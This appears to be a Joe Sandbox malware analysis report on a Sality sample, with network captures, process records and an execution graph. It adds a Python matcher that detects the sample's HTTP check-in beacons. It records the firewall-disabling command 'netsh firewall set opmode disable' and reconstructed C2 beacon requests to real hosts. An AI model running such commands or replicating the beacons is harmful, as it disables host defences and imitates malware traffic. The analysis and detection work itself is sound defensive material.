Jul 25, 2024 13:45:06.936081886 CEST | 1236 | IN | Data Raw: 75 72 6c 28 2f 2e 73 2f 69 6d 67 2f 65 72 72 2f 34 30 34 2d 61 72 72 6f 77 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 20 31 30 70 78 3b 7d 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0a 2f 2a 2d 2d
                                Data Ascii: url(/.s/img/err/404-arrow.png) no-repeat left 10px;}/*--------------------*//*--------main--------*/#main {padding: 50px 0 55px 0;}.main-left {float: left; width: 160px; text-align: center;}.errortitle {font: 18px/24px 'Verdana'; color: #
Jul 25, 2024 13:45:06.936094046 CEST | 1236 | IN | Data Raw: 63 68 69 6c 64 2b 68 74 6d 6c 20 2e 73 65 61 72 63 68 73 62 6d 20 7b 62 6f 72 64 65 72 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 66 6f
                                Data Ascii: child+html .searchsbm {border: 0 !important;}/*--------------------*//*-------footer-------*/#footer {padding: 15px 0 0 0; border-top: 1px solid #dbdbdb;}.footer-col {float: left; width: 24.9%;}.footer-col h4 { margin: 0 0 15px 0; font: 1
Jul 25, 2024 13:45:06.937660933 CEST | 672 | IN | Data Raw: 73 63 61 70 65 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 2b 28 28 74 79 70 65 6f 66 28 73 63 72 65 65 6e 29 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 3f 22 22 3a 22 3b 73 22 2b 73 63 72 65 65 6e 2e 77 69 64 74 68 2b 22 2a 22 2b 73
                                Data Ascii: scape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script>.../LiveInternet-->... Yandex.M
Jul 25, 2024 13:45:07.082715034 CEST | 1236 | IN | Data Raw: 73 63 72 69 70 74 22 3b 0a 20 20 20 20 73 2e 61 73 79 6e 63 20 3d 20 74 72 75 65 3b 0a 20 20 20 20 73 2e 73 72 63 20 3d 20 28 64 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 20 3d 3d 20 22 68 74 74 70 73 3a 22 20 3f 20 22 68 74 74 70 73
                                Data Ascii: script"; s.async = true; s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f); } else { f(); }
Jul 25, 2024 13:45:07.083062887 CEST | 1236 | IN | Data Raw: 73 73 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 3b 3c 2f 6c 69 3e 0a 3c 6c 69 3e 2d 20 75 73 65 20 74 68 65 20 57 65 62 20 73 65 61 72 63 68 20 61 6e 64 20 66 69 6e 64 20 77 68 61 74 20 79 6f 75 20 77 65 72 65 20 6c 6f 6f 6b 69 6e
                                Data Ascii: ss in the address bar;</li><li>- use the Web search and find what you were looking for:</li></ul><div id="search"><form action="https://google.com/search" method="get"><input type="text" class="searchword" name="q" /><input type="submit"
Jul 25, 2024 13:45:07.083090067 CEST | 635 | IN | Data Raw: 0a 3c 75 6c 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 75 63 6f 7a 2e 63 6f 6d 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 55 73 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22
                                Data Ascii: <ul><li><a href="https://www.ucoz.com/terms/">Terms of Use</a></li><li><a href="https://www.ucoz.com/privacy/">Privacy Policy</a></li></ul></div> <div class="clear"></div> </div> </div></div><script> var pushe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49710 | 107.172.18.180 | 80 | 7092 | C:\Users\user\Desktop\LisectAVT_2403002B_38.exe
Timestamp | Bytes transferred | Direction | Data
Jul 25, 2024 13:45:07.708813906 CEST | 138 | OUT | GET /mainf.gif?76caf3=7785203 HTTP/1.1
                                User-Agent: Opera/8.89 (Windows NT 6.0; U; en)
                                Host: steamboy.h17.ru
                                Cache-Control: no-cache
Jul 25, 2024 13:45:08.191555023 CEST | 382 | IN | HTTP/1.1 301 Moved Permanently
                                Server: nginx/1.25.2
                                Date: Thu, 25 Jul 2024 11:45:08 GMT
                                Content-Type: text/html
                                Content-Length: 169
                                Connection: keep-alive
                                Location: https://www.otzywy.com/?76caf3=7785203
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.25.2</center></body></html>
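Both sessions carry the same request shape: a GET for /main&lt;letter&gt;.gif with one &lt;6 hex digits&gt;=&lt;decimal&gt; query pair, an Opera 8.x User-Agent that no real browser has sent in years, Cache-Control: no-cache, and no Accept or Referer header. The first server answered 404 (a dead uCoz host) and the second redirected to https://www.otzywy.com/, which the TCP list shows the sample then contacted over TLS on 195.201.126.132. The matcher below is an added example, not report content and not the body of ET signature 2018340; it encodes those four observable traits and runs them over the two captured requests plus two constructed negative controls. The trait set, the three-of-four threshold and the control requests are the author's assumptions.

```python
"""Trait-based matcher for the Sality-style HTTP check-in captured in sessions 0 and 1.

Added example, not part of the Joe Sandbox report. SESSION0 and SESSION1 are
reconstructed from this page; BROWSER and NOCACHE_GIF are constructed negative
controls. The traits and threshold are the author's reading of the captured
requests, not the content of ET signature 2018340.
"""
import re
from dataclasses import dataclass, field

# /main<letter>.gif followed by exactly one <6 hex digits>=<decimal> pair
CHECKIN_PATH = re.compile(r"^/main[a-z]\.gif\?[0-9a-f]{6}=\d+$")
# Opera 8.x claiming Windows NT, as in both captured requests
LEGACY_OPERA_UA = re.compile(r"^Opera/8\.\d+ \(Windows NT ")


@dataclass
class HttpRequest:
    method: str
    target: str
    version: str
    headers: dict = field(default_factory=dict)


def parse_request(raw: str) -> HttpRequest:
    """Parse an HTTP/1.x request head (request line plus headers, CRLF or LF)."""
    lines = raw.lstrip("\r\n").splitlines()
    method, target, version = lines[0].strip().split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, version, headers)


def checkin_traits(req: HttpRequest) -> list:
    """Return the names of the captured check-in's traits that this request shares."""
    hits = []
    if req.method == "GET" and CHECKIN_PATH.match(req.target):
        hits.append("path")
    if LEGACY_OPERA_UA.match(req.headers.get("user-agent", "")):
        hits.append("legacy-opera-ua")
    if req.headers.get("cache-control", "").lower() == "no-cache":
        hits.append("no-cache")
    if "accept" not in req.headers and "referer" not in req.headers:
        hits.append("bare-headers")  # browsers send Accept; this client does not
    return hits


def is_sality_checkin(raw: str, min_traits: int = 3) -> bool:
    """Flag when at least min_traits of the four traits are present (assumed threshold)."""
    return len(checkin_traits(parse_request(raw))) >= min_traits


# Reconstructed from the report's HTTP sessions 0 and 1.
SESSION0 = (
    "GET /mainh.gif?7231d3=37419295 HTTP/1.1\r\n"
    "User-Agent: Opera/8.89 (Windows NT 6.0; U; en)\r\n"
    "Host: macedonia.my1.ru\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
SESSION1 = (
    "GET /mainf.gif?76caf3=7785203 HTTP/1.1\r\n"
    "User-Agent: Opera/8.89 (Windows NT 6.0; U; en)\r\n"
    "Host: steamboy.h17.ru\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
# Constructed negative controls: a browser page load and a no-cache fetch of a gif.
BROWSER = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Accept: text/html\r\n\r\n"
)
NOCACHE_GIF = (
    "GET /images/main.gif HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: curl/8.0\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)

if __name__ == "__main__":
    for name, raw in [("session0", SESSION0), ("session1", SESSION1),
                      ("browser", BROWSER), ("nocache_gif", NOCACHE_GIF)]:
        print(name, is_sality_checkin(raw), checkin_traits(parse_request(raw)))
```

Requiring three of the four traits keeps a lone no-cache fetch of a real image (two traits) below the line while still matching both captured beacons (all four). On a sensor that already has the IDS alert, the per-trait output is what you use to triage: a hit on path plus legacy-opera-ua is worth an escalation even when the server, as here, answers 404.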


Target ID: 0
Start time: 07:45:00
Start date: 25/07/2024
Path: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\LisectAVT_2403002B_38.exe"
Imagebase: 0x400000
File size: 563'744 bytes
MD5 hash: DCD409FA904F30AB580781337FB866B7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Sality, Description: Yara detected Sality, Source: 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 1
Start time: 07:45:00
Start date: 25/07/2024
Path: C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit): true
Commandline: netsh firewall set opmode disable
Imagebase: 0x15c0000
File size: 82'432 bytes
MD5 hash: 4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 07:45:00
Start date: 25/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 07:45:01
Start date: 25/07/2024
Path: C:\Windows\System32\fontdrvhost.exe
Wow64 process (32bit): false
Commandline: "fontdrvhost.exe"
Imagebase: 0x7ff69ba10000
File size: 827'408 bytes
MD5 hash: BBCB897697B3442657C7D6E3EDDBD25F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 5
Start time: 07:45:01
                                Start date:25/07/2024
                                Path:C:\Windows\System32\fontdrvhost.exe
                                Wow64 process (32bit):false
                                Commandline:"fontdrvhost.exe"
                                Imagebase:0x7ff69ba10000
                                File size:827'408 bytes
                                MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:false

                                Target ID:6
                                Start time:07:45:01
                                Start date:25/07/2024
                                Path:C:\Windows\System32\dwm.exe
                                Wow64 process (32bit):false
                                Commandline:"dwm.exe"
                                Imagebase:0x7ff7751a0000
                                File size:94'720 bytes
                                MD5 hash:5C27608411832C5B39BA04E33D53536C
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:false


                                  Execution Graph

                                  Execution Coverage:5.2%
                                  Dynamic/Decrypted Code Coverage:40.1%
                                  Signature Coverage:28.1%
                                  Total number of Nodes:822
                                  Total number of Limit Nodes:41
                                  execution_graph 25879 408440 194 API calls 25983 402b40 189 API calls 25919 407d40 184 API calls 3 library calls 25984 407f40 182 API calls 25920 408540 181 API calls 25949 407a40 186 API calls setSBUpLow 25950 408640 187 API calls ___crtsetenv 25985 419740 RtlUnwind 25880 410044 76 API calls _LocaleUpdate::_LocaleUpdate 25454 2303b39 RegSetValueExA RegCloseKey 25922 412951 78 API calls __filbuf 25923 407950 175 API calls 25924 406550 182 API calls setSBUpLow 25925 409d50 204 API calls 2 library calls 25986 405350 179 API calls 25953 40617b 183 API calls 3 library calls 25885 40a860 188 API calls 3 library calls 25927 401960 172 API calls 25955 407e60 182 API calls setSBUpLow 25991 408770 184 API calls 25956 22f341d 9 API calls 25888 407875 177 API calls 2 library calls 25889 22f9e18 GetFileAttributesA 25876 230260c RtlExitUserThread 25930 41297e 112 API calls 9 library calls 25890 408800 198 API calls 3 library calls 25931 408d00 211 API calls 3 library calls 25992 409700 190 API calls 4 library calls 24915 231f470 24916 231f488 24915->24916 24917 231f5a2 LoadLibraryA 24916->24917 24920 231f5e7 VirtualProtect VirtualProtect 24916->24920 24918 231f5b9 24917->24918 24918->24916 24922 231f5cb GetProcAddress 24918->24922 24921 231f64c 24920->24921 24921->24921 24922->24918 24923 231f5e1 ExitProcess 24922->24923 25893 22ffe67 FindClose Sleep 25959 410208 110 API calls 3 library calls 25894 41180e 105 API calls 4 library calls 25895 40dc0f 70 API calls ___InternalCxxFrameHandler 25896 408c10 195 API calls 25960 404210 171 API calls 25456 47c116 25458 47c11b 25456->25458 25459 47c137 LoadLibraryA 25458->25459 25469 47c150 25458->25469 25481 47c365 25459->25481 25463 47c17b GetModuleFileNameA 25470 47c2e7 LoadLibraryA GetProcAddress 25463->25470 25471 47c344 Sleep 25463->25471 25467 47c23e MapViewOfFile 25468 47c278 CreateThread 25467->25468 25473 47c254 25467->25473 25475 47c29e Sleep 25468->25475 25495 47c7d4 25468->25495 25469->25463 
25476 47c365 7 API calls 25469->25476 25470->25471 25472 47c310 CreateMutexA GetLastError 25470->25472 25474 47c34f ExitProcess 25471->25474 25472->25471 25472->25474 25473->25468 25475->25463 25478 47c1af 25476->25478 25480 47c365 7 API calls 25478->25480 25480->25459 25482 47c2c2 GetModuleFileNameA 25481->25482 25483 47c1e4 25481->25483 25485 47c2e7 LoadLibraryA GetProcAddress 25482->25485 25486 47c344 Sleep 25482->25486 25490 47c36a 25483->25490 25485->25486 25487 47c310 CreateMutexA GetLastError 25485->25487 25488 47c34f ExitProcess 25486->25488 25487->25486 25487->25488 25491 47c36e 25490->25491 25491->25490 25491->25491 25492 47c371 GetProcAddress 25491->25492 25494 47c1fb SetErrorMode CreateFileMappingA CreateFileMappingA 25491->25494 25493 47c365 7 API calls 25492->25493 25493->25491 25494->25467 25494->25468 25496 47c933 CreateMutexA 25495->25496 25500 47c7e8 25495->25500 25496->25500 25497 47c969 25498 47cbc9 25497->25498 25499 47c9a0 VirtualAlloc 25497->25499 25499->25498 25503 47c9fb 25499->25503 25500->25496 25500->25497 25501 47cb64 LoadLibraryA 25501->25498 25501->25503 25503->25498 25503->25501 25504 47cbf5 KiUserExceptionDispatcher 25503->25504 25505 47cc08 25504->25505 25505->25503 25932 47d91c GetCPInfo 25933 402d20 193 API calls 4 library calls 25962 409220 192 API calls 25963 406e20 191 API calls 24924 2303e54 RegCloseKey 25966 230045c 17 API calls 25897 41282c 5 API calls 2 library calls 25967 404630 183 API calls 3 library calls 25898 414036 InitializeCriticalSection 25877 22f1d53 GlobalFree 25899 413c3f 68 API calls 2 library calls 25935 4079c0 190 API calls 25994 4087c0 185 API calls 25995 409fc0 193 API calls setSBUpLow 25969 40e2c8 5 API calls ___security_init_cookie 25936 4099cb 194 API calls 4 library calls 25996 22f61a0 GetFileAttributesA 25900 40a0d0 209 API calls 3 library calls 25970 405ed0 192 API calls __itoa 25971 4066d0 190 API calls 2 library calls 25997 4073d0 223 API calls 3 library calls 25998 40d7d0 6 API calls 3 library 
calls 25999 40bbd9 66 API calls ctype 26000 415fdf 67 API calls 2 library calls 25972 406ee0 173 API calls 2 library calls 26001 402be0 194 API calls 25903 4140e3 SetLastError type_info::_Type_info_dtor 25937 40ede6 TlsAlloc 24925 40e0e8 24980 410694 24925->24980 24927 40e0f4 GetStartupInfoA GetProcessHeap HeapAlloc 24928 40e133 GetVersionExA 24927->24928 24929 40e126 24927->24929 24931 40e151 GetProcessHeap HeapFree 24928->24931 24932 40e143 GetProcessHeap HeapFree 24928->24932 25018 40e083 66 API calls 3 library calls 24929->25018 24934 40e17d 24931->24934 24933 40e12d type_info::_Type_info_dtor 24932->24933 24981 415170 HeapCreate 24934->24981 24936 40e1be 24937 40e1ca 24936->24937 25019 40e083 66 API calls 3 library calls 24936->25019 25020 40f0cd 77 API calls 6 library calls 24937->25020 24940 40e1d0 24941 40e1d4 24940->24941 24942 40e1dc __RTC_Initialize 24940->24942 25021 40e083 66 API calls 3 library calls 24941->25021 24991 410412 71 API calls 3 library calls 24942->24991 24944 40e1db 24944->24942 24946 40e1e9 24947 40e1f5 GetCommandLineA 24946->24947 24948 40e1ed 24946->24948 24992 416e23 76 API calls 3 library calls 24947->24992 25022 40c5d6 66 API calls 3 library calls 24948->25022 24951 40e205 25023 416d6a 111 API calls 3 library calls 24951->25023 24952 40e1f4 24952->24947 24954 40e20f 24955 40e213 24954->24955 24956 40e21b 24954->24956 25024 40c5d6 66 API calls 3 library calls 24955->25024 24993 416af7 110 API calls 6 library calls 24956->24993 24959 40e21a 24959->24956 24960 40e220 24961 40e224 24960->24961 24962 40e22c 24960->24962 25025 40c5d6 66 API calls 3 library calls 24961->25025 24994 40c6f2 74 API calls 4 library calls 24962->24994 24965 40e22b 24965->24962 24966 40e232 24967 40e237 24966->24967 24968 40e23e 24966->24968 25026 40c5d6 66 API calls 3 library calls 24967->25026 24995 416a9a 110 API calls 2 library calls 24968->24995 24971 40e23d 24971->24968 24972 40e243 24973 40e248 24972->24973 24996 403a30 24972->24996 24973->24972 24976 
40e26e 25030 40c888 66 API calls _abort 24976->25030 24979 40e273 24979->24933 24980->24927 24982 415190 24981->24982 24983 415193 24981->24983 24982->24936 25031 415115 66 API calls 3 library calls 24983->25031 24985 415198 24986 4151a2 24985->24986 24987 4151c6 24985->24987 25032 4151ca HeapAlloc 24986->25032 24987->24936 24989 4151ac 24989->24987 24990 4151b1 HeapDestroy 24989->24990 24990->24982 24991->24946 24992->24951 24993->24960 24994->24966 24995->24972 25033 403b80 RegOpenKeyExA 24996->25033 24998 403a5e 25060 40a9a0 24998->25060 25000 403a75 25153 4053f0 198 API calls setSBUpLow 25000->25153 25002 403a7e 25003 403a82 LoadStringA LoadStringA MessageBoxA 25002->25003 25004 403ac8 25002->25004 25005 403aed 25003->25005 25154 40b180 222 API calls 3 library calls 25004->25154 25157 40a450 213 API calls 2 library calls 25005->25157 25008 403ad1 25012 403ae8 25008->25012 25013 403aef 25008->25013 25009 403afd 25158 403df0 WaitForSingleObject UnmapViewOfFile CloseHandle ReleaseMutex CloseHandle 25009->25158 25011 403b02 25159 40c042 25011->25159 25155 4025b0 189 API calls 4 library calls 25012->25155 25156 401f00 173 API calls 3 library calls 25013->25156 25017 403b14 25017->24976 25027 40c866 25017->25027 25018->24933 25019->24937 25020->24940 25021->24944 25022->24952 25023->24954 25024->24959 25025->24965 25026->24971 25421 40c784 25027->25421 25029 40c873 25029->24976 25030->24979 25031->24985 25032->24989 25034 403bbb RegQueryValueExA 25033->25034 25035 403dcb 25033->25035 25037 403bfd _memset 25034->25037 25036 40c042 setSBUpLow 5 API calls 25035->25036 25038 403ddc 25036->25038 25039 403c4e RegCloseKey 25037->25039 25040 403c0f RegQueryValueExA 25037->25040 25038->24998 25039->25035 25041 403c61 25039->25041 25042 403c3b 25040->25042 25043 403c2b PathIsRelativeA 25040->25043 25041->25035 25044 403c6c CreateMutexA 25041->25044 25042->25039 25043->25039 25043->25042 25044->25035 25045 403c86 WaitForSingleObject CreateFileMappingA 25044->25045 25046 403ce2 
GetLastError MapViewOfFile 25045->25046 25047 403cab ReleaseMutex CloseHandle 25045->25047 25049 403d55 GetFileAttributesA 25046->25049 25050 403d0d CloseHandle ReleaseMutex CloseHandle 25046->25050 25048 40c042 setSBUpLow 5 API calls 25047->25048 25051 403cdb 25048->25051 25055 403d70 CreateDirectoryA 25049->25055 25056 403d7c 25049->25056 25052 40c042 setSBUpLow 5 API calls 25050->25052 25051->24998 25054 403d4e 25052->25054 25054->24998 25055->25056 25167 40c051 25056->25167 25182 403260 25060->25182 25064 40aa0f 25300 4010c0 179 API calls 25064->25300 25066 40aa2a 25301 4010c0 179 API calls 25066->25301 25068 40aa45 25302 4010c0 179 API calls 25068->25302 25070 40aa60 25303 4010c0 179 API calls 25070->25303 25072 40aa7b 25304 4010c0 179 API calls 25072->25304 25074 40aa96 25305 4010c0 179 API calls 25074->25305 25076 40aab1 25306 4010c0 179 API calls 25076->25306 25078 40aacc 25307 4010c0 179 API calls 25078->25307 25080 40aae7 25308 4010c0 179 API calls 25080->25308 25082 40ab02 25309 4010c0 179 API calls 25082->25309 25084 40ab1d 25310 4010c0 179 API calls 25084->25310 25086 40ab38 25311 4010c0 179 API calls 25086->25311 25088 40ab53 25312 4010c0 179 API calls 25088->25312 25090 40ab6e 25313 4010c0 179 API calls 25090->25313 25092 40ab89 25314 4010c0 179 API calls 25092->25314 25094 40aba4 25315 4010c0 179 API calls 25094->25315 25096 40abbf 25316 4010c0 179 API calls 25096->25316 25098 40abda 25317 4010c0 179 API calls 25098->25317 25100 40abf5 25318 4010c0 179 API calls 25100->25318 25102 40ac10 25319 4010c0 179 API calls 25102->25319 25104 40ac2b 25320 4010c0 179 API calls 25104->25320 25106 40ac46 25321 4010c0 179 API calls 25106->25321 25108 40ac61 25322 4010c0 179 API calls 25108->25322 25110 40ac7c 25323 4010c0 179 API calls 25110->25323 25112 40ac97 25324 4010c0 179 API calls 25112->25324 25114 40acb2 25325 4010c0 179 API calls 25114->25325 25116 40accd 25326 4010c0 179 API calls 25116->25326 25118 40ace8 25327 4010c0 179 API calls 25118->25327 25120 
40ad03 25328 4010c0 179 API calls 25120->25328 25122 40ad1e 25329 4010c0 179 API calls 25122->25329 25124 40ad39 25330 4010c0 179 API calls 25124->25330 25126 40ad54 25331 4010c0 179 API calls 25126->25331 25128 40ad6f 25332 4010c0 179 API calls 25128->25332 25130 40ad8a 25333 4010c0 179 API calls 25130->25333 25132 40ada5 25334 4010c0 179 API calls 25132->25334 25134 40adc0 25335 4010c0 179 API calls 25134->25335 25136 40addb 25336 4010c0 179 API calls 25136->25336 25138 40adf6 25337 4025b0 189 API calls 4 library calls 25138->25337 25140 40ae02 25338 4025b0 189 API calls 4 library calls 25140->25338 25142 40ae0e 25339 4025b0 189 API calls 4 library calls 25142->25339 25144 40ae1a 25340 4025b0 189 API calls 4 library calls 25144->25340 25146 40ae26 25341 401c90 181 API calls 2 library calls 25146->25341 25148 40ae37 25342 401110 171 API calls __fsopen 25148->25342 25150 40ae43 25150->25150 25343 401c90 181 API calls 2 library calls 25150->25343 25152 40ae9f LoadStringA 25152->25000 25153->25002 25154->25008 25155->25005 25156->25005 25157->25009 25158->25011 25160 40c04a 25159->25160 25161 40c04c IsDebuggerPresent 25159->25161 25160->25017 25420 417530 25161->25420 25164 41134d SetUnhandledExceptionFilter UnhandledExceptionFilter 25165 411372 GetCurrentProcess TerminateProcess 25164->25165 25166 41136a __invoke_watson 25164->25166 25165->25017 25166->25165 25168 40c07c 25167->25168 25169 40c05f 25167->25169 25168->25169 25171 40c083 25168->25171 25178 40f493 66 API calls _raise 25169->25178 25180 4108ee 102 API calls 13 library calls 25171->25180 25172 40c064 25179 40f434 66 API calls 2 library calls 25172->25179 25175 40c0a9 25176 403d90 ReleaseMutex 25175->25176 25181 4106ed 100 API calls 5 library calls 25175->25181 25176->25035 25178->25172 25180->25175 25181->25176 25344 403e70 25182->25344 25185 4032b1 GetCurrentProcess 25186 4032c3 25185->25186 25187 403303 25186->25187 25189 40c051 _sprintf 102 API calls 25186->25189 25187->25187 25367 40bc1d 75 API calls 
5 library calls 25187->25367 25191 4032e4 MessageBoxA 25189->25191 25190 4033a4 25368 4010c0 179 API calls 25190->25368 25193 40c866 66 API calls 25191->25193 25193->25187 25194 4033f3 25369 4010c0 179 API calls 25194->25369 25196 40340e 25370 4010c0 179 API calls 25196->25370 25198 403429 25371 4010c0 179 API calls 25198->25371 25200 403444 25372 4010c0 179 API calls 25200->25372 25202 40345f 25373 4010c0 179 API calls 25202->25373 25204 40347a 25374 4010c0 179 API calls 25204->25374 25206 403495 25375 4010c0 179 API calls 25206->25375 25208 4034b0 25376 4010c0 179 API calls 25208->25376 25210 4034cb 25377 4010c0 179 API calls 25210->25377 25212 4034e6 25378 4010c0 179 API calls 25212->25378 25214 403501 25379 4010c0 179 API calls 25214->25379 25216 40351c 25380 4010c0 179 API calls 25216->25380 25218 403537 25381 4010c0 179 API calls 25218->25381 25220 403552 25382 4010c0 179 API calls 25220->25382 25222 40356d 25383 4010c0 179 API calls 25222->25383 25224 403588 GetWindowsDirectoryA 25384 401c90 181 API calls 2 library calls 25224->25384 25227 4035ea GetSystemDirectoryA 25385 401c90 181 API calls 2 library calls 25227->25385 25229 403611 25386 401b50 174 API calls 25229->25386 25231 403623 25387 401c90 181 API calls 2 library calls 25231->25387 25233 40363a GetCurrentDirectoryA 25388 401c90 181 API calls 2 library calls 25233->25388 25235 403661 _memset 25236 40367b SHGetFolderPathA 25235->25236 25237 40369a PathAppendA 25236->25237 25238 4036ad 25236->25238 25237->25238 25389 401c90 181 API calls 2 library calls 25238->25389 25240 4036c1 SHGetFolderPathA 25241 4036d7 25240->25241 25242 4036eb SHGetSpecialFolderPathA 25240->25242 25390 401c90 181 API calls 2 library calls 25241->25390 25391 401c90 181 API calls 2 library calls 25242->25391 25245 403713 SHGetSpecialFolderPathA 25392 401c90 181 API calls 2 library calls 25245->25392 25247 403735 25393 40c553 121 API calls 5 library calls 25247->25393 25249 40373f 25394 401c90 181 API calls 2 library calls 
25249->25394 25251 40374f 25395 40c553 121 API calls 5 library calls 25251->25395 25253 403759 25396 401c90 181 API calls 2 library calls 25253->25396 25255 403769 SHGetSpecialFolderPathA 25397 401c90 181 API calls 2 library calls 25255->25397 25257 40378b GetUserDefaultLangID 25258 40c051 _sprintf 102 API calls 25257->25258 25259 4037aa 25258->25259 25398 401c90 181 API calls 2 library calls 25259->25398 25261 4037c1 25262 40c051 _sprintf 102 API calls 25261->25262 25263 4037da 25262->25263 25399 401c90 181 API calls 2 library calls 25263->25399 25265 4037f1 25400 401c90 181 API calls 2 library calls 25265->25400 25267 403802 GetModuleFileNameA 25401 401c90 181 API calls 2 library calls 25267->25401 25269 40382d 25402 401c90 181 API calls 2 library calls 25269->25402 25271 403841 25403 401300 76 API calls 25271->25403 25273 403850 25404 401c90 181 API calls 2 library calls 25273->25404 25275 40385d GetComputerNameA 25405 401c90 181 API calls 2 library calls 25275->25405 25277 40388c GetUserNameA 25406 401c90 181 API calls 2 library calls 25277->25406 25279 4038b3 GetVersionExA 25280 40c051 _sprintf 102 API calls 25279->25280 25281 4038dd 25280->25281 25407 401c90 181 API calls 2 library calls 25281->25407 25283 4038f4 25284 40c051 _sprintf 102 API calls 25283->25284 25285 40390b 25284->25285 25408 401c90 181 API calls 2 library calls 25285->25408 25287 403922 25288 403931 25287->25288 25289 4039ae 25287->25289 25290 4039f9 25288->25290 25409 401c90 181 API calls 2 library calls 25288->25409 25410 401c90 181 API calls 2 library calls 25289->25410 25412 401c90 181 API calls 2 library calls 25290->25412 25294 403a0a 25295 40c042 setSBUpLow 5 API calls 25294->25295 25296 403a1e 25295->25296 25299 4010c0 179 API calls 25296->25299 25298 40394b 25298->25290 25411 401c90 181 API calls 2 library calls 25298->25411 25299->25064 25300->25066 25301->25068 25302->25070 25303->25072 25304->25074 25305->25076 25306->25078 25307->25080 25308->25082 25309->25084 25310->25086 
25311->25088 25312->25090 25313->25092 25314->25094 25315->25096 25316->25098 25317->25100 25318->25102 25319->25104 25320->25106 25321->25108 25322->25110 25323->25112 25324->25114 25325->25116 25326->25118 25327->25120 25328->25122 25329->25124 25330->25126 25331->25128 25332->25130 25333->25132 25334->25134 25335->25136 25336->25138 25337->25140 25338->25142 25339->25144 25340->25146 25341->25148 25342->25150 25343->25152 25345 403e7a 25344->25345 25346 403e95 WaitForSingleObject 25345->25346 25347 403f98 25345->25347 25413 40c02b 102 API calls __vsprintf_l 25346->25413 25348 40c042 setSBUpLow 5 API calls 25347->25348 25350 40328f GetModuleHandleA GetProcAddress 25348->25350 25350->25185 25350->25187 25351 403ec1 OutputDebugStringA 25414 40c3e9 160 API calls __fsopen 25351->25414 25353 403ee1 25354 403f8a ReleaseMutex 25353->25354 25355 403eee GetLocalTime GetTimeFormatA 25353->25355 25354->25347 25356 403f3a 25355->25356 25357 403f1e 25355->25357 25359 403f6c 25356->25359 25416 40cff5 103 API calls 7 library calls 25356->25416 25415 40c1d6 104 API calls 8 library calls 25357->25415 25417 40cff5 103 API calls 7 library calls 25359->25417 25362 403f7a 25418 40cf99 106 